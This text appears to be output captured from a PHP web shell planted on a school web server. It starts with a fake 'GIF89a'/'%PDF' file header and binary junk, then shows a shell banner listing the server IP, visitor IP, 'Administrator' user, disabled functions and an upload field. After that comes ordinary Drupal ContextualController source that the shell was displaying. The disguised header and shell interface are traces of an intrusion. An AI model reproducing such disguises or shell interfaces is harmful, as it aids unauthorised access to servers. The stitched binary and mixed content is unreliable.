GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/contextual/src/ |
Upload File : |
<?php namespace Drupal\contextual; use Symfony\Component\DependencyInjection\ContainerAwareInterface; use Symfony\Component\DependencyInjection\ContainerAwareTrait; use Symfony\Component\HttpFoundation\JsonResponse; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpKernel\Exception\BadRequestHttpException; /** * Returns responses for Contextual module routes. */ class ContextualController implements ContainerAwareInterface { use ContainerAwareTrait; /** * Returns the requested rendered contextual links. * * Given a list of contextual links IDs, render them. Hence this must be * robust to handle arbitrary input. * * @see contextual_preprocess() * * @return \Symfony\Component\HttpFoundation\JsonResponse * The JSON response. */ public function render(Request $request) { $ids = $request->request->get('ids'); if (!isset($ids)) { throw new BadRequestHttpException(t('No contextual ids specified.')); } $rendered = []; foreach ($ids as $id) { $element = [ '#type' => 'contextual_links', '#contextual_links' => _contextual_id_to_links($id), ]; $rendered[$id] = $this->container->get('renderer')->renderRoot($element); } return new JsonResponse($rendered); } }